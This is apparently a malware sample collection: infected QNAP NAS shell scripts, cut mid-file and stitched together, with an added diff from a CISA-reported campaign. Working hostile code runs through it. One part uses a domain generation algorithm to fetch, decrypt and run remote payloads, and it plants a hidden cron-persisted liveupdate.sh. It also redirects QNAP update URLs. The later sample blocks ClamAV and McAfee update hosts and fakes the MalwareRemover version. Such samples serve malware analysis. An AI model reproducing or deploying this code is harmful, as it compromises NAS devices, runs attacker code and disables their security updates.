$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
|
||||
|
||||
UNZIP_TIME=$(date +"%T")
|
||||
fi
|
||||
|
||||
if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
# create folder and create symbolic link
|
||||
/bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
|
||||
fi
|
||||
|
||||
# wait connect
|
||||
sleep 5
|
||||
CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
|
||||
if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
|
||||
SLEEP_TIME=$(( 30 * $COUNTER ))
|
||||
if [ $SLEEP_TIME -gt 300 ]; then
|
||||
SLEEP_TIME=300
|
||||
fi
|
||||
# wait next retry
|
||||
sleep $SLEEP_TIME
|
||||
fi
|
||||
COUNTER=$(( $COUNTER * 2 ))
|
||||
done
|
||||
|
||||
END_TIME=$(date +"%T")
|
||||
echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
|
||||
# call for a new process group and for later kill
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
|
||||
|
||||
# set cloudinstall report status
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
|
||||
# add link to report offline
|
||||
/bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
|
||||
|
||||
# buzzer
|
||||
HARDWARE_TYPE=$(uname -m)
|
||||
if [[ "$HARDWARE_TYPE" == *"x86"* ]];
|
||||
then
|
||||
/sbin/hal_app --se_buzzer enc_id=0,mode=101
|
||||
elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
|
||||
then
|
||||
/sbin/pic_raw 81
|
||||
fi
|
||||
;;
|
||||
|
||||
stop)
|
||||
# disconnect cloudinstall agent
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
|
||||
for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
|
||||
do
|
||||
# use bash kill instead /bin/kill for kill process group
|
||||
# cloudinstall agent daemon and inotifywait
|
||||
kill -9 -- -$i &>/dev/null
|
||||
done
|
||||
|
||||
# umount
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
/bin/umount -l $USED_LOOP_DEVICE
|
||||
/usr/local/sbin/losetup -d $USED_LOOP_DEVICE
|
||||
else
|
||||
/bin/umount -l $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
# remove all files
|
||||
if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $NAS_CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
|
||||
fi
|
||||
;;
|
||||
|
||||
restart)
|
||||
$0 stop
|
||||
$0 start
|
||||
;;
|
||||
|
||||
*)
|
||||
echo "Usage: $0 {start|stop|restart}"
|
||||
exit 1
|
||||
esac
|
||||
exit 0
|
||||
|
||||
|
||||
set_env()
|
||||
{
|
||||
debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
|
||||
if [ "$debug" != "NULL" ]; then
|
||||
/bin/touch $LOG_FILE
|
||||
else
|
||||
/bin/rm -f $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
set_env
|
||||
|
||||
dbg()
|
||||
{
|
||||
if [ -f "$LOG_FILE" ]; then
|
||||
echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
dbg "> $0 $@ (pid $$)"
|
||||
|
||||
fi
|
||||
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
|
||||
EOF
|
||||
test "$fgrep" || fgrep=grep
|
||||
test "$RANDOM" || RANDOM=17653
|
||||
genrstr ()
|
||||
{
|
||||
local s=;
|
||||
local min=${1:-4};
|
||||
local max=${2:-12};
|
||||
local kspace="${3:-a-zA-Z}"
|
||||
tr -dc "$kspace" < /dev/urandom | {
|
||||
read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
|
||||
echo "$s"
|
||||
}
|
||||
}
|
||||
|
||||
verifyfile() {
|
||||
local file="$1"
|
||||
local sig="${2:-$file_s}"
|
||||
local out
|
||||
test ! -z "$file" && test -s "$file" || return 1
|
||||
test ! -z "$sig" && test -s "$sig" || return 1
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
decryptfile() {
|
||||
local file="$1"
|
||||
local ofile="${2:-${file}}"
|
||||
local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
|
||||
openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
|
||||
test -f "$ofile" && rm -f "$ofile"
|
||||
mv "${file}_d" "$ofile" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
|
||||
DOMAIN_EXT_A='cf tk ml ga gq'
|
||||
DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
|
||||
|
||||
test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
|
||||
cd "${bdir}/.qpkg/.liveupdate" && rm -f .tmp.*
|
||||
|
||||
echo "$verifykey" > ".rsakey"
|
||||
i=0 n=0 c=0 errorcount=0
|
||||
outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
|
||||
|
||||
for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
|
||||
for ext in $domainexts; do
|
||||
hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
|
||||
hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
|
||||
hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
|
||||
hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
|
||||
for host in $hostnames; do
|
||||
test -f "$outfile" && rm -f "$outfile"
|
||||
recentupdate=''
|
||||
curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
|
||||
test -s "$outfile" || continue
|
||||
fsize=$(( $(wc -c < "$outfile") ))
|
||||
test "$fsize" -gt 4096 && rm -f "$outfile" && continue
|
||||
rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
|
||||
test "$rsamsg" || continue
|
||||
path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
|
||||
hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
|
||||
test "$rsadomain" = "${host}.${ext}" || continue
|
||||
timenow=$(date +%s)
|
||||
test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
|
||||
curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
|
||||
filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
|
||||
test "$filehash" = "$hash" || continue
|
||||
curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
|
||||
verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
|
||||
mv "${outfile}_s" "${ts}_v"
|
||||
chmod 755 "$outfile" || continue
|
||||
( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" </dev/null >/dev/null 2>&1 & ) & )
|
||||
test "$recentupdate" -eq 1 && exit 0
|
||||
done
|
||||
done
|
||||
done
|
||||
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
|
||||
set_default_disable_status()
|
||||
{
|
||||
QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
|
||||
OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
|
||||
if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
|
||||
return
|
||||
fi
|
||||
|
||||
if [ "$QPKG_ENABLE" = "NULL" ]; then
|
||||
if [ "$OLD_ENABLE" = "FALSE" ]; then
|
||||
dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
|
||||
export QNAP_QPKG=rtrr
|
||||
else
|
||||
export QNAP_QPKG=HybridBackup
|
||||
/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
|
||||
fi
|
||||
start()
|
||||
{
|
||||
if [ -f /usr/bin/qsyncman ]; then
|
||||
[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
|
||||
/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
|
||||
/usr/bin/crontab /etc/config/crontab
|
||||
echo -n "Starting QSync manitor: "
|
||||
[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
|
||||
[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
|
||||
[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
|
||||
[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
|
||||
[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
|
||||
[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
|
||||
[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
|
||||
/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
|
||||
echo "OK"
|
||||
fi
|
||||
}
|
||||
|
||||
stop()
|
||||
{
|
||||
echo "Shutting down QSync monitor: OK"
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
kill $pidnum 2>/dev/null
|
||||
i=0
|
||||
while [ ${i} -lt 5 ]
|
||||
do
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
if [ -z "$pidnum" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
i=`/usr/bin/expr ${i} + 1`
|
||||
done
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
[ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
|
||||
/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
|
||||
/usr/bin/killall -q qsyncman
|
||||
}
|
||||
|
||||
start_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x1 ] || return -1
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
[ -z $_qsyncd_run_pid ] || return -114
|
||||
_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
|
||||
_with_syslog=$1
|
||||
if [ "x$_recycle_en" = xTRUE ]; then
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
else
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
fi
|
||||
_iret=$?
|
||||
if [ "x$_iret" = x0 ]; then
|
||||
i=0
|
||||
while [ ${i} -lt 10000 ]
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
fi
|
||||
return -$_iret
|
||||
}
|
||||
|
||||
stop_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x0 ] || return -1
|
||||
_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
[ $_qsyncd_pid -lt 0 ] && return -3
|
||||
# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
# Send SIGINT to stop the QSyncd process
|
||||
/bin/kill -SIGINT $_qsyncd_pid
|
||||
_kill_ret=$?
|
||||
if [ "x$_kill_ret" != x0 ]; then
|
||||
return -3
|
||||
fi
|
||||
echo "need wait $1 millisecond"
|
||||
i=0
|
||||
while true
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
if [ ${i} -ge $1 ]; then
|
||||
# if time-out, we send two additional SIGINT to force the daemon to stop.
|
||||
if [ $_qsyncd_pid -ge 0 ]; then
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
fi
|
||||
j=0
|
||||
while [ ${j} -lt 500 ]
|
||||
do
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ -z $_qsyncd_run_pid ]; then
|
||||
return 0
|
||||
fi
|
||||
usleep 20000
|
||||
j=`/usr/bin/expr ${j} + 20`
|
||||
done
|
||||
return -62
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
return 0
|
||||
}
|
||||
|
||||
|
||||
install()
|
||||
{
|
||||
lock_file="/var/lock/qbox_install_bin.lck"
|
||||
|
||||
if [ ! -f "${INSTALL_BUILD_IN}" ]; then
|
||||
dbg "build-in ${QSYNC_NAME} is installed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
|
||||
dbg "${QSYNC_NAME}.bin} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -x "${QPKG_CLI}" ]; then
|
||||
dbg "${QPKG_CLI} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## make sure volume is exist
|
||||
if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
|
||||
dbg "/share/Public not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## is removed
|
||||
if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "${QSYNC_NAME} is removed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ -f "$lock_file" ]; then
|
||||
if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
|
||||
echo "${QSYNC_NAME} is installing"
|
||||
dbg "${QSYNC_NAME} is installing"
|
||||
return 1
|
||||
fi
|
||||
fi
|
||||
|
||||
/bin/touch "$lock_file"
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "install build-in ${QSYNC_NAME} start"
|
||||
|
||||
set_default_disable_status
|
||||
|
||||
## install build in Qsync
|
||||
${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
sleep 20
|
||||
|
||||
wait_install=60
|
||||
## avoid initial take long time or fail
|
||||
while [ "$wait_install" -gt 0 ]; do
|
||||
stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
|
||||
if [ "$stcode" = "0" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
let "wait_install--"
|
||||
done
|
||||
|
||||
${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
|
||||
/bin/rm -f "$lock_file"
|
||||
dbg "install build-in ${QSYNC_NAME} success"
|
||||
}
|
||||
|
||||
if [ "$1" == "stop" ]; then
|
||||
exit 0
|
||||
fi
|
||||
fi
|
||||
XEOF
|
||||
fi
|
||||
chmod 755 "${bdir}/.qpkg/.liveupdate/liveupdate.sh"
|
||||
touch -cr /bin/busybox "${bdir}/.qpkg/.liveupdate/liveupdate.sh"
|
||||
|
||||
crontabargs=$(ps | grep 'cr[o]nd ' | sed -n 's/.*crond[^0-9A-Za-z-]*\(.\+\)/\1/p')
|
||||
trycount=10; trycount=$(( $trycount - 10 ))
|
||||
set x $crontabargs; shift
|
||||
while [ $# -gt 0 ] && [ $trycount -lt 10 ]; do
|
||||
trycount=$(( $trycount + 1 ))
|
||||
getopts ':c:' OPT 2>/dev/null
|
||||
test "$OPT" = 'c' && crontabfile="${OPTARG}/admin" && break
|
||||
test "$OPTIND" -gt 0 && shift "$OPTIND" && OPTIND=1 || break
|
||||
done
|
||||
test "$crontabfile" && test -f "${crontabfile}" || crontabfile='/tmp/cron/crontabs/admin'
|
||||
|
||||
for crontab in "$crontabfile" "${confdir}/crontab"; do
|
||||
if $fgrep "${bdir}/.qpkg/.liveupdate/liveupdate.sh" "$crontab"; then
|
||||
:
|
||||
else
|
||||
cronmins=$(printf '%i' "$(( $RANDOM % 60 ))")
|
||||
cronhour=$(printf '%i' "$(( $RANDOM % 24 ))")
|
||||
cronhour=$(printf '%i,' "$(( ( $cronhour + 8 ) % 24 ))" "$(( ( $cronhour + 16 ) % 24 ))")"$cronhour"
|
||||
echo "$cronmins $cronhour"' * * * '"${bdir}/.qpkg/.liveupdate/liveupdate.sh >/dev/null 2>/dev/null" >> "$crontab"
|
||||
sleep 5
|
||||
fi
|
||||
done
|
||||
|
||||
grep 'Liveupdate\|FirmwareRelease\|QTS_FW' /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com' >/dev/null && sed -i 's/https\?:\/\/[^\/]\+\/\(Liveupdate\|FirmwareRelease\|QTS_FW\)/http:\/\/0.0.0.0\/\1/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
|
||||
sedexpr='QPKG CENTER XML\|Live Update XML\|FW_XML_ALT'
|
||||
if grep "${sedexpr}" /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com' >/dev/null; then
|
||||
sed -i 's/^ *\('"${sedexpr}"'\)\(.*https\?:\/\/[^\/]*\)\(qnap\.com[^\/]*\)/\1\20.0.0.0/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
|
||||
grep "${sedexpr}" /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com' && sed -i 's/^ *\('"${sedexpr}"'\).*qnap\.com/\1 = /' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
|
||||
fi
|
||||
|
||||
( ( exec >/dev/null 2>&1 </dev/null; "${bdir}/.qpkg/.liveupdate/liveupdate.sh" </dev/null >/dev/null 2>/dev/null & ) & )
|
||||
exit 0
|
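--- a/2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/55b5671876f463f2f75db423b188a1d478a466c5e68e6f9d4f340396f6558b9f
+++ b/2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/55b5671876f463f2f75db423b188a1d478a466c5e68e6f9d4f340396f6558b9f
@@ -0,0 +1,212 @@
+#!/bin/bash
+ts=1548478800
+PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin"
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"` && test -d "$bdir" || bdir=''
+test -z "${bdir}" || test ! -d "${bdir}"; } && { while read -r bdir; do
+test -d "$bdir" && break; bdir=''
+done <<EOF
+$(mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp")
+EOF
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in {{CE_,}CACHEDEV{1,2,3},MD0,HDA}_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { bdir=/mnt/HDA_ROOT && test -d "$bdir" || bdir='/'; }; }
+
+getcfg MalwareRemover Version -f /etc/config/qpkg.conf && setcfg MalwareRemover Version 9.0.0 -f /etc/config/qpkg.conf
+getcfg MalwareRemover Date -f /etc/config/qpkg.conf && setcfg MalwareRemover Date 2019-02-25 -f /etc/config/qpkg.conf
+getcfg MalwareRemover Build -f /etc/config/qpkg.conf && setcfg MalwareRemover Build 1551070800 -f /etc/config/qpkg.conf
+
+if grep "ipv6.clamav.net" /etc/hosts; then
+:
+else
+countries='ac ad ae af ag ai al am an ao aq ar as at au aw ax az ba bb bd be bf bg bh bi bj bl bm bn bo bq br bs bt bv bw by bz ca cc cd cf cg ch ci ck cl cm cn co cr cu cv cw cx cy cz de dj dk dm do dz ec ee eg eh er es et eu fi fj fk fm fo fr ga gb gd ge gf gg gh gi gl gm gn gp gq gr gs gt gu gw gy hk hm hn hr ht hu id ie il im in io iq ir is it je jm jo jp ke kg kh ki km kn kp kr kw ky kz la lb lc li lk lr ls lt lu lv ly ma mc md me mf mg mh mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nc ne nf ng ni nl no np nr nu nz om pa pe pf pg ph pk pl pm pn pr ps pt pw py qa re ro rs ru rw sa sb sc sd se sg sh si sj sk sl sm sn so sr ss st su sv sx sy sz tc td tf tg th tj tk tl tm tn to tp tr tt tv tw tz ua ug uk um us uy uz va vc ve vg vi vn vu wf ws ye yt za zm zw'
+
+{ for host in 'bugs.clamav.net' 'current.cvd.clamav.net' 'database.clamav.net' 'db.local.clamav.net' 'update.nai.com'; do
+echo "0.0.0.0 ${host}"
+done
+
+for country in $countries; do
+echo "0.0.0.0 db.${country}.clamav.net"
+echo "0.0.0.0 db.${country}.ipv6.clamav.net"
+echo "0.0.0.0 db.${country}.big.clamav.net"
+done; } >>/etc/hosts
+fi
+
+test -z "$PWD" && PWD=$(pwd)
+CWD="$PWD"
+if [ "${CWD%/*}" != "${bdir}/.qpkg" ]; then
+CWD=''
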